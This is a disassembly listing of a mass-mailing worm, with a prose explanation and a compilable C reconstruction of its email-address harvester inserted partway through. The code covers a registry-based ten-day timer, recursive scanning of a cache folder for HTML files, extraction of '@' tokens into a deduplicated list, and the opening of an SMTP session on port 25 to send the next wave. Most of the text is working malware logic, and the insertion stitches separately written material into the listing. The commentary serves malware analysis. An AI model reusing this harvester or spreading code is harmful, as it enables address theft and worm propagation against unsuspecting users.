361754D9 push 80000001h 361754DE mov [ebp+var_8], edi 361754E1 call ds:RegCreateKeyExA 361754E7 test eax, eax 361754E9 jnz loc_36175574 361754EF cmp [ebp+var_14], 2 361754F3 push esi 361754F4 jnz short loc_36175548 361754F6 lea eax, [ebp+var_8] 361754F9 mov esi, offset aCache ; "Cache" 361754FE push eax 361754FF lea eax, [ebp+var_18] 36175502 push eax 36175503 push ebx 36175504 push ebx 36175505 push esi 36175506 push [ebp+var_4] 36175509 call ds:RegQueryValueExA 3617550F test eax, eax 36175511 jnz short loc_36175533 36175513 mov eax, [ebp+var_18] 36175516 add eax, 0Ah 36175519 cmp eax, [ebp+var_C] 3617551C jnb short loc_3617556A 3617551E push [ebp+var_8] 36175521 lea eax, [ebp+var_C] 36175524 push eax 36175525 push edi 36175526 push ebx 36175527 push esi 36175528 push [ebp+var_4] 3617552B call ds:RegSetValueExA 36175531 jmp short loc_36175563 36175533 ; ─────────────────────────────────────────────────────────────────────────── 36175533 36175533 loc_36175533: ; CODE XREF: sub_3617548D+84j 36175533 push [ebp+var_8] 36175536 lea eax, [ebp+var_C] 36175539 push eax 3617553A push edi 3617553B push ebx 3617553C push esi 3617553D push [ebp+var_4] 36175540 call ds:RegSetValueExA 36175546 jmp short loc_3617556A 36175548 ; ─────────────────────────────────────────────────────────────────────────── 36175548 36175548 loc_36175548: ; CODE XREF: sub_3617548D+67j 36175548 push [ebp+var_8] 3617554B lea eax, [ebp+var_C] 3617554E push eax 3617554F push edi 36175550 push ebx 36175551 push offset aCache ; "Cache" 36175556 push [ebp+var_4] 36175559 call ds:RegSetValueExA 3617555F test eax, eax 36175561 jnz short loc_3617556A 36175563 36175563 loc_36175563: ; CODE XREF: sub_3617548D+A4j 36175563 mov [ebp+var_10], 1 3617556A 3617556A loc_3617556A: ; CODE XREF: sub_3617548D+8Fj 3617556A ; sub_3617548D+B9j ... 
3617556A push [ebp+var_4] 3617556D call ds:RegCloseKey 36175573 pop esi 36175574 36175574 loc_36175574: ; CODE XREF: sub_3617548D+5Cj 36175574 cmp [ebp+var_10], ebx 36175577 mov byte_3617D664, bl 3617557D pop edi 3617557E pop ebx 3617557F jz short loc_36175586 36175581 call sub_3617558B 36175586 36175586 loc_36175586: ; CODE XREF: sub_3617548D+F2j 36175586 push 1 36175588 pop eax 36175589 leave 3617558A retn 3617558A sub_3617548D endp 3617558A 3617558B 3617558B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617558B 3617558B ; Attributes: bp-based frame 3617558B 3617558B sub_3617558B proc near ; CODE XREF: sub_3617548D+F4p 3617558B 3617558B var_408 = byte ptr -408h 3617558B var_8 = dword ptr -8 3617558B var_4 = dword ptr -4 3617558B 3617558B push ebp 3617558C mov ebp, esp 3617558E sub esp, 408h 36175594 lea eax, [ebp+var_4] 36175597 mov [ebp+var_8], 400h 3617559E push eax 3617559F push 0F003Fh 361755A4 push 0 361755A6 push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"... 
361755AB push 80000001h 361755B0 call ds:RegOpenKeyExA 361755B6 test eax, eax 361755B8 jnz short loc_361755ED 361755BA lea eax, [ebp+var_8] 361755BD push eax 361755BE lea eax, [ebp+var_408] 361755C4 push eax 361755C5 push 0 361755C7 push 0 361755C9 push offset aCache ; "Cache" 361755CE push [ebp+var_4] 361755D1 call ds:RegQueryValueExA 361755D7 push [ebp+var_4] 361755DA call ds:RegCloseKey 361755E0 lea eax, [ebp+var_408] 361755E6 push eax 361755E7 call sub_361755FC 361755EC pop ecx 361755ED 361755ED loc_361755ED: ; CODE XREF: sub_3617558B+2Dj 361755ED call sub_36175FA5 361755F2 call sub_361759E8 361755F7 push 1 361755F9 pop eax 361755FA leave 361755FB retn 361755FB sub_3617558B endp 361755FB 361755FC 361755FC ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361755FC 361755FC 361755FC sub_361755FC proc near ; CODE XREF: sub_3617558B+5Cp 361755FC ; sub_361755FC+F5p 361755FC 361755FC var_164 = dword ptr -164h 361755FC var_150 = dword ptr -150h 361755FC var_14C = byte ptr -14Ch 361755FC var_124 = byte ptr -124h 361755FC var_120 = byte ptr -120h 361755FC var_8 = dword ptr -8 361755FC 361755FC sub esp, 144h 36175602 push esi 36175603 push edi 36175604 mov edi, 400h 36175609 push edi 3617560A push 8 3617560C push dword_3617ACB4 36175612 call dword_3617AC74 36175618 mov esi, eax 3617561A test esi, esi 3617561C jz loc_361757BC 36175622 push ebx 36175623 push ebp 36175624 mov ebp, ds:strncpy 3617562A push edi 3617562B push [esp+164h+var_8] 36175632 push esi 36175633 call ebp ; strncpy 36175635 push esi 36175636 call sub_3617186E 3617563B push [esp+170h+var_8] 36175642 call _strlen 36175647 mov ebx, ds:strncat 3617564D mov ecx, edi 3617564F sub ecx, eax 36175651 push ecx 36175652 push offset a_ ; "\\*.*" 36175657 push esi 36175658 call ebx ; strncat 3617565A add esp, 20h 3617565D lea eax, [esp+160h+var_14C] 36175661 push eax 36175662 push esi 36175663 call ds:FindFirstFileA 36175669 cmp eax, 0FFFFFFFFh 3617566C mov [esp+160h+var_150], eax 36175670 
jnz short loc_36175679 36175672 xor edi, edi 36175674 jmp loc_361757A9 36175679 ; ─────────────────────────────────────────────────────────────────────────── 36175679 36175679 loc_36175679: ; CODE XREF: sub_361755FC+74j 36175679 ; sub_361755FC+19Aj 36175679 lea eax, [esp+160h+var_120] 3617567D push eax 3617567E call ds:_strlwr 36175684 lea eax, [esp+164h+var_120] 36175688 mov [esp+164h+var_164], offset dot ; "." 3617568F push eax 36175690 call _strcmp 36175695 pop ecx 36175696 test eax, eax 36175698 pop ecx 36175699 jz loc_36175785 3617569F lea eax, [esp+160h+var_120] 361756A3 push offset a__ ; ".." 361756A8 push eax 361756A9 call _strcmp 361756AE pop ecx 361756AF test eax, eax 361756B1 pop ecx 361756B2 jz loc_36175785 361756B8 test [esp+160h+var_14C], 10h 361756BD jz short loc_361756FB 361756BF push edi 361756C0 push [esp+164h+var_8] 361756C7 push esi 361756C8 call ebp ; strncpy 361756CA push esi 361756CB call _strlen 361756D0 mov ecx, edi 361756D2 sub ecx, eax 361756D4 push ecx 361756D5 push offset asc_36179474 ; "\\" 361756DA push esi 361756DB call ebx ; strncat 361756DD push esi 361756DE call _strlen 361756E3 mov ecx, edi 361756E5 sub ecx, eax 361756E7 lea eax, [esp+180h+var_120] 361756EB push ecx 361756EC push eax 361756ED push esi 361756EE call ebx ; strncat 361756F0 push esi 361756F1 call sub_361755FC 361756F6 jmp loc_36175782 361756FB ; ─────────────────────────────────────────────────────────────────────────── 361756FB 361756FB loc_361756FB: ; CODE XREF: sub_361755FC+C1j 361756FB lea eax, [esp+160h+var_120] 361756FF push eax 36175700 call _strlen 36175705 cmp eax, 4 36175708 pop ecx 36175709 jbe short loc_36175785 3617570B lea eax, [esp+160h+var_120] 3617570F push offset dot_htm ; ".htm" 36175714 push eax 36175715 call _strlen 3617571A pop ecx 3617571B lea eax, [esp+eax+164h+var_124] 3617571F push eax 36175720 call _strcmp 36175725 pop ecx 36175726 test eax, eax 36175728 pop ecx 36175729 jz short loc_3617574B 3617572B lea eax, [esp+160h+var_120] 3617572F 
push offset html_ext ; "html" 36175734 push eax 36175735 call _strlen 3617573A pop ecx 3617573B lea eax, [esp+eax+164h+var_124] 3617573F push eax 36175740 call _strcmp 36175745 pop ecx 36175746 test eax, eax 36175748 pop ecx 36175749 jnz short loc_36175785 3617574B 3617574B loc_3617574B: ; CODE XREF: sub_361755FC+12Dj 3617574B push edi 3617574C push [esp+164h+var_8] 36175753 push esi 36175754 call ebp ; strncpy 36175756 push esi 36175757 call _strlen 3617575C mov ecx, edi 3617575E sub ecx, eax 36175760 push ecx 36175761 push offset asc_36179474 ; "\\" 36175766 push esi 36175767 call ebx ; strncat 36175769 push esi 3617576A call _strlen 3617576F mov ecx, edi 36175771 sub ecx, eax 36175773 lea eax, [esp+180h+var_120] 36175777 push ecx 36175778 push eax 36175779 push esi 3617577A call ebx ; strncat 3617577C push esi 3617577D call sub_361757C5 36175782 36175782 loc_36175782: ; CODE XREF: sub_361755FC+FAj 36175782 add esp, 30h 36175785 36175785 loc_36175785: ; CODE XREF: sub_361755FC+9Dj 36175785 ; sub_361755FC+B6j ... 
36175785 lea eax, [esp+160h+var_14C] 36175789 push eax 3617578A push [esp+164h+var_150] 3617578E call ds:FindNextFileA 36175794 test eax, eax 36175796 jnz loc_36175679 3617579C push [esp+160h+var_150] 361757A0 call ds:FindClose 361757A6 push 1 361757A8 pop edi 361757A9 361757A9 loc_361757A9: ; CODE XREF: sub_361755FC+78j 361757A9 push esi 361757AA push 0 361757AC push dword_3617ACB4 361757B2 call dword_3617AC70 361757B8 pop ebp 361757B9 mov eax, edi 361757BB pop ebx 361757BC 361757BC loc_361757BC: ; CODE XREF: sub_361755FC+20j 361757BC pop edi 361757BD pop esi 361757BE add esp, 144h 361757C4 retn 361757C4 sub_361755FC endp ; sp = -18h 361757C4 361757C5 361757C5 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361757C5 361757C5 ; Attributes: bp-based frame 361757C5 361757C5 sub_361757C5 proc near ; CODE XREF: sub_361755FC+181p 361757C5 361757C5 var_108 = byte ptr -108h 361757C5 var_8 = dword ptr -8 361757C5 var_4 = dword ptr -4 361757C5 arg_0 = dword ptr 8 361757C5 361757C5 push ebp 361757C6 mov ebp, esp 361757C8 sub esp, 108h 361757CE push ebx 361757CF push esi 361757D0 xor ebx, ebx 361757D2 push edi 361757D3 push ebx 361757D4 push ebx 361757D5 push 3 361757D7 push ebx 361757D8 push 3 361757DA push 80000000h 361757DF push [ebp+arg_0] 361757E2 mov [ebp+var_8], ebx 361757E5 call ds:CreateFileA 361757EB mov esi, eax 361757ED cmp esi, 0FFFFFFFFh 361757F0 jz short loc_36175829 361757F2 push ebx 361757F3 push esi 361757F4 call ds:GetFileSize 361757FA mov edi, eax 361757FC cmp edi, 0FFFFFFFFh 361757FF mov [ebp+arg_0], edi 36175802 jz short loc_36175822 36175804 cmp edi, 800000h 3617580A ja short loc_36175822 3617580C push edi 3617580D push 8 3617580F push dword_3617ACB4 36175815 call dword_3617AC74 3617581B cmp eax, ebx 3617581D mov [ebp+var_4], eax 36175820 jnz short loc_36175830 36175822 36175822 loc_36175822: ; CODE XREF: sub_361757C5+3Dj 36175822 ; sub_361757C5+45j 36175822 push esi 36175823 call ds:CloseHandle 36175829 36175829 
loc_36175829: ; CODE XREF: sub_361757C5+2Bj 36175829 xor eax, eax 3617582B jmp loc_36175914 36175830 ; ─────────────────────────────────────────────────────────────────────────── 36175830 36175830 loc_36175830: ; CODE XREF: sub_361757C5+5Bj 36175830 lea ecx, [ebp+var_8] 36175833 push ebx 36175834 push ecx 36175835 push edi 36175836 push eax 36175837 push esi 36175838 call ds:ReadFile 3617583E test eax, eax 36175840 push esi 36175841 jnz short loc_36175850 36175843 call ds:CloseHandle 36175849 xor esi, esi 3617584B jmp loc_36175902 36175850 ; ─────────────────────────────────────────────────────────────────────────── 36175850 36175850 loc_36175850: ; CODE XREF: sub_361757C5+7Cj 36175850 call ds:CloseHandle 36175856 xor ecx, ecx 36175858 xor esi, esi 3617585A xor edi, edi 3617585C cmp [ebp+arg_0], ebx 3617585F jbe loc_361758FF 36175865 36175865 loc_36175865: ; CODE XREF: sub_361757C5+134j 36175865 mov edx, [ebp+var_4] 36175868 mov al, [edi+edx] 3617586B cmp al, 7Bh 3617586D jge short loc_36175894 3617586F cmp al, 2Dh 36175871 jle short loc_36175894 36175873 cmp al, 2Fh 36175875 jz short loc_36175894 36175877 cmp al, 3Ah 36175879 jl short loc_3617587F 3617587B cmp al, 3Fh 3617587D jle short loc_36175894 3617587F 3617587F loc_3617587F: ; CODE XREF: sub_361757C5+B4j 3617587F cmp al, 5Bh 36175881 jl short loc_36175887 36175883 cmp al, 5Eh 36175885 jle short loc_36175894 36175887 36175887 loc_36175887: ; CODE XREF: sub_361757C5+BCj 36175887 cmp al, 60h 36175889 jz short loc_36175894 3617588B cmp al, 40h 3617588D jnz short loc_361758F5 3617588F push 1 36175891 pop esi 36175892 jmp short loc_361758F5 36175894 ; ─────────────────────────────────────────────────────────────────────────── 36175894 36175894 loc_36175894: ; CODE XREF: sub_361757C5+A8j 36175894 ; sub_361757C5+ACj ... 
36175894 cmp esi, ebx 36175896 jz short loc_361758F1 36175898 cmp edi, ecx 3617589A jbe short loc_361758EB 3617589C mov esi, edi 3617589E sub esi, ecx 361758A0 cmp esi, 2 361758A3 jbe short loc_361758EB 361758A5 cmp esi, 80h 361758AB jnb short loc_361758EB 361758AD lea eax, [esi-1] 361758B0 push eax 361758B1 lea eax, [ecx+edx+1] 361758B5 push eax 361758B6 lea eax, [ebp+var_108] 361758BC push eax 361758BD call _memcpy 361758C2 lea eax, [ebp+esi+var_108] 361758C9 add esp, 0Ch 361758CC mov [eax-1], bl 361758CF cmp [ebp+var_108], 40h 361758D6 jz short loc_361758EB 361758D8 cmp byte ptr [eax-2], 40h 361758DC jz short loc_361758EB 361758DE lea eax, [ebp+var_108] 361758E4 push eax 361758E5 call sub_36175919 361758EA pop ecx 361758EB 361758EB loc_361758EB: ; CODE XREF: sub_361757C5+D5j 361758EB ; sub_361757C5+DEj ... 361758EB xor esi, esi 361758ED mov ecx, edi 361758EF jmp short loc_361758F5 361758F1 ; ─────────────────────────────────────────────────────────────────────────── 361758F1 361758F1 loc_361758F1: ; CODE XREF: sub_361757C5+D1j 361758F1 mov ecx, edi 361758F3 xor esi, esi 361758F5 361758F5 loc_361758F5: ; CODE XREF: sub_361757C5+C8j 361758F5 ; sub_361757C5+CDj ... 361758F5 inc edi 361758F6 cmp edi, [ebp+arg_0] 361758F9 jb loc_36175865 361758FF 361758FF loc_361758FF: ; CODE XREF: sub_361757C5+9Aj 361758FF push 1 36175901 pop esi 36175902 36175902 loc_36175902: ; CODE XREF: sub_361757C5+86j 36175902 push [ebp+var_4] 36175905 push ebx 36175906 push dword_3617ACB4 3617590C call dword_3617AC70 36175912 mov eax, esi 36175914 36175914 loc_36175914: ; CODE XREF: sub_361757C5+66j 36175914 pop edi 36175915 pop esi 36175916 pop ebx 36175917 leave 36175918 retn 36175918 sub_361757C5 endp 36175918 36175919 36175919 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175919 36175919 ; Attributes: bp-based frame 36175919 36175919 sub_36175919 proc near ; CODE XREF: sub_361757C5+120p 36175919 ; sub_36175FA5+D8p ... 
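The routines from sub_3617548D down to sub_36175919 (whose body is listed right after this example) are the address harvester that feeds the mass-mailing. sub_3617548D computes a day counter from GetSystemTime (year*16Dh + month*1Eh + day), compares it with the "Cache" value stored under an HKCU key (name truncated in the listing) and only calls sub_3617558B when the stored value plus 0Ah is below the current one, i.e. the mailing run repeats at most every ten days. sub_3617558B reads the "Cache" value of a second HKCU key and passes that directory to sub_361755FC, which recurses through it and, for every file longer than four characters whose lowercased name ends in ".htm" or "html", calls sub_361757C5. That routine loads files of at most 800000h bytes and walks them byte by byte with the compare chain at loc_36175865: '.', digits, letters and '_' are token bytes, '@' is a token byte that also flags a candidate, everything else is a separator; a flagged token of 2..126 bytes that neither starts nor ends with '@' goes to sub_36175919, which lowercases it, re-checks the '@' rules and pushes it on a singly linked list of 84h-byte nodes at dword_3617D700 unless it is already there. The C below is an added reconstruction written for this edit, not the worm's source or the article's code, with the same byte classes and the two quirks the listing has (ecx starts at 0, so a token at file offset 0 loses its first byte, and a token not followed by a separator before EOF is never flushed); the HTML sample is constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 0x84-byte node as allocated at loc_361759A9: 0x80 bytes of name followed
 * by the next pointer. dword_3617D700 is the head of the list. */
struct addr_node { char name[0x80]; struct addr_node *next; };
static struct addr_node *addr_list;                 /* dword_3617D700 */

/* sub_361755FC descends into a file only if its lowercased name is longer
 * than 4 characters and its last four are ".htm" or "html". */
static int is_target_file(const char *name)
{
    char low[260];
    size_t len = strlen(name);
    if (len <= 4 || len >= sizeof low) return 0;
    for (size_t i = 0; i <= len; i++) low[i] = (char)tolower((unsigned char)name[i]);
    return strcmp(low + len - 4, ".htm") == 0 || strcmp(low + len - 4, "html") == 0;
}

/* Byte classes of the compare chain at loc_36175865 (signed compares on al,
 * so every byte >= 0x80 also ends a token): separators are >= '{', <= '-',
 * '/', ':'..'?', '['..'^' and '`'; '.', digits, letters, '_' and '@' are
 * token bytes, and '@' additionally flags the token as a candidate. */
static int is_separator(unsigned char ch)
{
    return ch >= 0x7B || ch <= 0x2D || ch == 0x2F || ch == 0x60
        || (ch >= 0x3A && ch <= 0x3F) || (ch >= 0x5B && ch <= 0x5E);
}

/* sub_36175919: lowercase, require length >= 3 and an '@' that is neither
 * first nor last, reject duplicates, otherwise push a new node on the list. */
static int add_address(const char *s)
{
    char buf[0x80];
    if (!s) return 0;
    strncpy(buf, s, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (char *p = buf; *p; p++) *p = (char)tolower((unsigned char)*p);
    size_t len = strlen(buf);
    if (len < 3 || !strchr(buf, '@') || buf[0] == '@' || buf[len - 1] == '@') return 0;
    for (struct addr_node *n = addr_list; n; n = n->next)
        if (strcmp(n->name, buf) == 0) return 0;
    struct addr_node *n = calloc(1, sizeof *n);
    if (!n) return 0;
    memcpy(n->name, buf, len + 1);
    n->next = addr_list;
    addr_list = n;
    return 1;
}

/* sub_361757C5 on an in-memory file body (files over 800000h bytes are
 * skipped). ecx (last_sep) starts at 0 and a token is data[last_sep+1..i-1],
 * so a token at offset 0 loses its first byte and a token not followed by a
 * separator before EOF is never flushed; both quirks are kept on purpose. */
static void harvest(const unsigned char *data, size_t size)
{
    size_t last_sep = 0;
    int seen_at = 0;
    char tok[0x108];
    if (size > 0x800000) return;
    for (size_t i = 0; i < size; i++) {
        if (!is_separator(data[i])) { if (data[i] == '@') seen_at = 1; continue; }
        if (seen_at && i > last_sep) {
            size_t span = i - last_sep;                /* separator + token bytes */
            if (span > 2 && span < 0x80) {
                memcpy(tok, data + last_sep + 1, span - 1);
                tok[span - 1] = '\0';
                if (tok[0] != '@' && tok[span - 2] != '@') add_address(tok);
            }
        }
        last_sep = i;
        seen_at = 0;
    }
}

static int address_present(const char *s)
{
    for (struct addr_node *n = addr_list; n; n = n->next)
        if (strcmp(n->name, s) == 0) return 1;
    return 0;
}

static size_t address_count(void)
{
    size_t c = 0;
    for (struct addr_node *n = addr_list; n; n = n->next) c++;
    return c;
}

static void clear_addresses(void)                   /* the free loop at loc_36175A4C */
{
    while (addr_list) { struct addr_node *n = addr_list->next; free(addr_list); addr_list = n; }
}

/* Constructed sample page; not taken from the original analysis. */
static const char sample_html[] =
    "<html><body>Contact: <a href=\"mailto:Admin@Example.COM\">Admin@Example.COM</a>"
    " or sales@example.com, not @bad or bad@ here, x@y</body></html>";

static size_t run_sample(void)
{
    clear_addresses();
    if (is_target_file("index.html"))
        harvest((const unsigned char *)sample_html, sizeof sample_html - 1);
    return address_count();
}

int main(void)
{
    run_sample();
    for (struct addr_node *n = addr_list; n; n = n->next) printf("%s\n", n->name);
    return 0;
}
```

Two practical consequences follow from the byte classes: the scanner accepts anything with an '@' in the middle, so "x@y" or a mangled mailto fragment ends up on the list and gets a delivery attempt, and it never parses HTML, so addresses inside comments or scripts are harvested just the same. A victim's browser cache therefore dictates who receives the next wave, which is why cleaning the cache directory was part of the eradication advice for this worm.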
36175919 36175919 var_81 = byte ptr -81h 36175919 var_80 = byte ptr -80h 36175919 arg_0 = dword ptr 8 36175919 36175919 push ebp 3617591A mov ebp, esp 3617591C sub esp, 80h 36175922 cmp [ebp+arg_0], 0 36175926 push ebx 36175927 push esi 36175928 mov esi, dword_3617D700 3617592E push edi 3617592F jz loc_361759E1 36175935 mov edi, ds:strncpy 3617593B mov ebx, 80h 36175940 push ebx 36175941 lea eax, [ebp+var_80] 36175944 push [ebp+arg_0] 36175947 push eax 36175948 call edi ; strncpy 3617594A lea eax, [ebp+var_80] 3617594D push eax 3617594E call ds:_strlwr 36175954 lea eax, [ebp+var_80] 36175957 push eax 36175958 call _strlen 3617595D add esp, 14h 36175960 cmp eax, 3 36175963 mov [ebp+arg_0], eax 36175966 jl short loc_361759E1 36175968 lea eax, [ebp+var_80] 3617596B push 40h 3617596D push eax 3617596E call ds:strchr 36175974 pop ecx 36175975 test eax, eax 36175977 pop ecx 36175978 jz short loc_361759E1 3617597A cmp [ebp+var_80], 40h 3617597E jz short loc_361759E1 36175980 mov eax, [ebp+arg_0] 36175983 cmp [ebp+eax+var_81], 40h 3617598B jz short loc_361759E1 3617598D 3617598D loc_3617598D: ; CODE XREF: sub_36175919+8Ej 3617598D test esi, esi 3617598F jz short loc_361759A9 36175991 lea eax, [ebp+var_80] 36175994 push esi 36175995 push eax 36175996 call _strcmp 3617599B pop ecx 3617599C test eax, eax 3617599E pop ecx 3617599F jz short loc_361759E1 361759A1 mov esi, [esi+80h] 361759A7 jmp short loc_3617598D 361759A9 ; ─────────────────────────────────────────────────────────────────────────── 361759A9 361759A9 loc_361759A9: ; CODE XREF: sub_36175919+76j 361759A9 push 84h 361759AE push 8 361759B0 push dword_3617ACB4 361759B6 call dword_3617AC74 361759BC test eax, eax 361759BE jz short loc_361759E1 361759C0 mov ecx, dword_3617D700 361759C6 push ebx 361759C7 mov [eax+80h], ecx 361759CD lea ecx, [ebp+var_80] 361759D0 push ecx 361759D1 push eax 361759D2 mov dword_3617D700, eax 361759D7 call edi ; strncpy 361759D9 add esp, 0Ch 361759DC push 1 361759DE pop eax 361759DF jmp short 
loc_361759E3 361759E1 ; ─────────────────────────────────────────────────────────────────────────── 361759E1 361759E1 loc_361759E1: ; CODE XREF: sub_36175919+16j 361759E1 ; sub_36175919+4Dj ... 361759E1 xor eax, eax 361759E3 361759E3 loc_361759E3: ; CODE XREF: sub_36175919+C6j 361759E3 pop edi 361759E4 pop esi 361759E5 pop ebx 361759E6 leave 361759E7 retn 361759E7 sub_36175919 endp 361759E7 361759E8 361759E8 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361759E8 361759E8 361759E8 sub_361759E8 proc near ; CODE XREF: sub_3617558B+67p 361759E8 push ebx 361759E9 xor ebx, ebx 361759EB cmp dword_3617D700, ebx 361759F1 jnz short loc_361759F7 361759F3 xor eax, eax 361759F5 pop ebx 361759F6 retn 361759F7 ; ─────────────────────────────────────────────────────────────────────────── 361759F7 361759F7 loc_361759F7: ; CODE XREF: sub_361759E8+9j 361759F7 cmp byte_3617D664, bl 361759FD push esi 361759FE jnz short loc_36175A44 36175A00 call ds:rand 36175A06 imul eax, 64h 36175A09 cdq 36175A0A mov ecx, 7FFFh 36175A0F idiv ecx 36175A11 mov edx, dword_3617D700 36175A17 36175A17 loc_36175A17: ; CODE XREF: sub_361759E8+33j 36175A17 ; sub_361759E8+46j 36175A17 cmp edx, ebx 36175A19 mov ecx, edx 36175A1B jz short loc_36175A17 36175A1D 36175A1D loc_36175A1D: ; CODE XREF: sub_361759E8+44j 36175A1D mov esi, eax 36175A1F dec eax 36175A20 test esi, esi 36175A22 jl short loc_36175A30 36175A24 mov ecx, [ecx+80h] 36175A2A cmp ecx, ebx 36175A2C jnz short loc_36175A1D 36175A2E jmp short loc_36175A17 36175A30 ; ─────────────────────────────────────────────────────────────────────────── 36175A30 36175A30 loc_36175A30: ; CODE XREF: sub_361759E8+3Aj 36175A30 push 80h 36175A35 push ecx 36175A36 push offset byte_3617D664 36175A3B call ds:strncpy 36175A41 add esp, 0Ch 36175A44 36175A44 loc_36175A44: ; CODE XREF: sub_361759E8+16j 36175A44 cmp dword_3617D700, ebx 36175A4A jz short loc_36175A7B 36175A4C 36175A4C loc_36175A4C: ; CODE XREF: sub_361759E8+91j 36175A4C push 
dword_3617D700 36175A52 call sub_36175AA9 36175A57 mov eax, dword_3617D700 36175A5C pop ecx 36175A5D push eax 36175A5E push ebx 36175A5F push dword_3617ACB4 36175A65 mov esi, [eax+80h] 36175A6B call dword_3617AC70 36175A71 cmp esi, ebx 36175A73 mov dword_3617D700, esi 36175A79 jnz short loc_36175A4C 36175A7B 36175A7B loc_36175A7B: ; CODE XREF: sub_361759E8+62j 36175A7B mov eax, dword_3617D704 36175A80 cmp eax, ebx 36175A82 jz short loc_36175AA3 36175A84 36175A84 loc_36175A84: ; CODE XREF: sub_361759E8+B9j 36175A84 mov esi, [eax+100h] 36175A8A push eax 36175A8B push ebx 36175A8C push dword_3617ACB4 36175A92 call dword_3617AC70 36175A98 mov eax, esi 36175A9A cmp esi, ebx 36175A9C mov dword_3617D704, eax 36175AA1 jnz short loc_36175A84 36175AA3 36175AA3 loc_36175AA3: ; CODE XREF: sub_361759E8+9Aj 36175AA3 push 1 36175AA5 pop eax 36175AA6 pop esi 36175AA7 pop ebx 36175AA8 retn 36175AA8 sub_361759E8 endp ; sp = -18h 36175AA8 36175AA9 36175AA9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175AA9 36175AA9 ; Attributes: bp-based frame 36175AA9 36175AA9 sub_36175AA9 proc near ; CODE XREF: sub_361759E8+6Ap 36175AA9 36175AA9 var_63C = byte ptr -63Ch 36175AA9 var_53C = byte ptr -53Ch 36175AA9 var_43C = byte ptr -43Ch 36175AA9 var_3C = byte ptr -3Ch 36175AA9 var_20 = word ptr -20h 36175AA9 var_1E = word ptr -1Eh 36175AA9 var_1C = byte ptr -1Ch 36175AA9 var_10 = dword ptr -10h 36175AA9 var_C = dword ptr -0Ch 36175AA9 var_8 = dword ptr -8 36175AA9 var_4 = dword ptr -4 36175AA9 arg_0 = dword ptr 8 36175AA9 36175AA9 push ebp 36175AAA mov ebp, esp 36175AAC sub esp, 63Ch 36175AB2 push ebx 36175AB3 push esi 36175AB4 push edi 36175AB5 push [ebp+arg_0] 36175AB8 call _strlen 36175ABD push 40h 36175ABF push [ebp+arg_0] 36175AC2 call ds:strchr 36175AC8 mov esi, eax 36175ACA xor ebx, ebx 36175ACC add esp, 0Ch 36175ACF cmp esi, ebx 36175AD1 jz loc_36175B58 36175AD7 push esi 36175AD8 call _strlen 36175ADD cmp eax, 2 36175AE0 pop ecx 36175AE1 jb short 
loc_36175B58 36175AE3 lea eax, [ebp+var_53C] 36175AE9 inc esi 36175AEA push eax 36175AEB push dword_3617A410 36175AF1 push esi 36175AF2 call sub_36171000 ; This worm seems to be written in some HLL, probably C. This can be evidenced by the 36175AF2 ; way the stack frame is set up within the subroutines. 36175AF7 add esp, 0Ch 36175AFA lea eax, [ebp+var_53C] 36175B00 push eax 36175B01 call dword_3617AC20 36175B07 mov esi, eax 36175B09 cmp esi, ebx 36175B0B jz short loc_36175B58 36175B0D push 10h 36175B0F lea eax, [ebp+var_20] 36175B12 push ebx 36175B13 push eax 36175B14 call _memset 36175B19 movsx eax, word ptr [esi+0Ah] 36175B1D push eax 36175B1E mov eax, [esi+0Ch] 36175B21 push dword ptr [eax] 36175B23 lea eax, [ebp+var_1C] 36175B26 push eax 36175B27 call _memcpy 36175B2C add esp, 18h 36175B2F mov [ebp+var_20], 2 36175B35 push 19h 36175B37 pop edi 36175B38 push edi 36175B39 call dword_3617AC38 36175B3F push ebx 36175B40 push 1 36175B42 pop esi 36175B43 mov [ebp+var_1E], ax 36175B47 push esi 36175B48 push 2 36175B4A call dword_3617AC5C 36175B50 cmp eax, 0FFFFFFFFh 36175B53 mov [ebp+var_4], eax 36175B56 jnz short loc_36175B5F 36175B58 36175B58 loc_36175B58: ; CODE XREF: sub_36175AA9+28j 36175B58 ; sub_36175AA9+38j ... 36175B58 xor eax, eax 36175B5A jmp loc_36175F17 36175B5F ; ─────────────────────────────────────────────────────────────────────────── 36175B5F 36175B5F loc_36175B5F: ; CODE XREF: sub_36175AA9+ADj 36175B5F mov [ebp+var_C], esi 36175B62 lea ecx, [ebp+var_C] 36175B65 mov esi, 8004667Eh 36175B6A push ecx 36175B6B push esi 36175B6C push eax 36175B6D call dword_3617AC18 36175B73 test eax, eax 36175B75 jz short loc_36175B7E 36175B77 36175B77 loc_36175B77: ; CODE XREF: sub_36175AA9+F7j 36175B77 ; sub_36175AA9+115j ... 
36175B77 xor esi, esi 36175B79 jmp loc_36175F0C 36175B7E ; ─────────────────────────────────────────────────────────────────────────── 36175B7E 36175B7E loc_36175B7E: ; CODE XREF: sub_36175AA9+CCj 36175B7E lea eax, [ebp+var_20] 36175B81 push 10h 36175B83 push eax 36175B84 push [ebp+var_4] 36175B87 call dword_3617AC58 36175B8D lea eax, [ebp+var_C] 36175B90 mov [ebp+var_C], ebx 36175B93 push eax 36175B94 push esi 36175B95 push [ebp+var_4] 36175B98 call dword_3617AC18 36175B9E test eax, eax 36175BA0 jnz short loc_36175B77 36175BA2 mov esi, 400h 36175BA7 push 0Ah 36175BA9 lea eax, [ebp+var_43C] 36175BAF push esi 36175BB0 push eax 36175BB1 push [ebp+var_4] 36175BB4 call sub_36176215 36175BB9 add esp, 10h 36175BBC test eax, eax 36175BBE jz short loc_36175B77 36175BC0 cmp [ebp+var_43C], 32h 36175BC7 jnz short loc_36175B77 36175BC9 lea eax, [ebp+var_43C] 36175BCF push offset SMTP_HELO ; "HELO " 36175BD4 push eax 36175BD5 call _strcpy 36175BDA pop ecx 36175BDB and [ebp+var_3C], 0 36175BDF pop ecx 36175BE0 lea eax, [ebp+var_8] 36175BE3 push eax 36175BE4 lea eax, [ebp+var_3C] 36175BE7 push eax 36175BE8 mov [ebp+var_8], edi 36175BEB call ds:GetComputerNameA 36175BF1 lea eax, [ebp+var_3C] 36175BF4 push 3F8h 36175BF9 push eax 36175BFA lea eax, [ebp+var_43C] 36175C00 push eax 36175C01 call ds:strncat 